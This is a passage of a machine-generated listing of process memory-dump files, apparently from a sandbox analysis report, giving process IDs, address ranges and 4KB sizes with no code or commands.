memory/3936-167-0x0000000006D00000-0x0000000006D01000-memory.dmpFilesize
4KB
-
memory/3956-128-0x0000000000000000-mapping.dmp
-
memory/4084-136-0x0000000000000000-mapping.dmp
-
memory/4084-229-0x0000000006813000-0x0000000006814000-memory.dmpFilesize
4KB
-
memory/4084-172-0x0000000006810000-0x0000000006811000-memory.dmpFilesize
4KB
-
memory/4084-215-0x0000000006812000-0x0000000006813000-memory.dmpFilesize
4KB
-
memory/4156-149-0x0000000000000000-mapping.dmp
-
memory/4156-187-0x0000000007250000-0x0000000007251000-memory.dmpFilesize
4KB
-
memory/4156-254-0x0000000007253000-0x0000000007254000-memory.dmpFilesize
4KB
-
memory/4156-193-0x0000000007252000-0x0000000007253000-memory.dmpFilesize
4KB
-
memory/4168-276-0x0000000000000000-mapping.dmp
-
memory/4184-273-0x0000000000000000-mapping.dmp
-
memory/4224-155-0x0000000000000000-mapping.dmp
-
memory/4224-201-0x00000000073E2000-0x00000000073E3000-memory.dmpFilesize
4KB
-
memory/4224-248-0x00000000073E3000-0x00000000073E4000-memory.dmpFilesize
4KB
-
memory/4224-192-0x00000000073E0000-0x00000000073E1000-memory.dmpFilesize
4KB
-
memory/4284-199-0x0000000007392000-0x0000000007393000-memory.dmpFilesize
4KB
-
memory/4284-203-0x0000000007390000-0x0000000007391000-memory.dmpFilesize
4KB
-
memory/4284-252-0x0000000007393000-0x0000000007394000-memory.dmpFilesize
4KB
-
memory/4284-161-0x0000000000000000-mapping.dmp
-
memory/4988-304-0x0000000000000000-mapping.dmp
-
memory/5100-294-0x0000000000000000-mapping.dmp
-
memory/5312-295-0x0000000000000000-mapping.dmp
-
memory/5988-300-0x0000000000000000-mapping.dmp
-
memory/6180-298-0x0000000000000000-mapping.dmp
-
memory/7144-301-0x0000000000000000-mapping.dmp
-
memory/7664-302-0x0000000000000000-mapping.dmp
-
memory/8308-303-0x0000000000000000-mapping.dmp
-
memory/8864-305-0x0000000000000000-mapping.dmp
-
memory/11720-255-0x0000000000000000-mapping.dmp
-
memory/14300-296-0x0000000000000000-mapping.dmp
-
memory/14488-306-0x0000000000000000-mapping.dmp
-
memory/14932-297-0x0000000000000000-mapping.dmp
-
memory/15248-260-0x0000000000000000-mapping.dmp
-
memory/15340-263-0x0000000000000000-mapping.dmp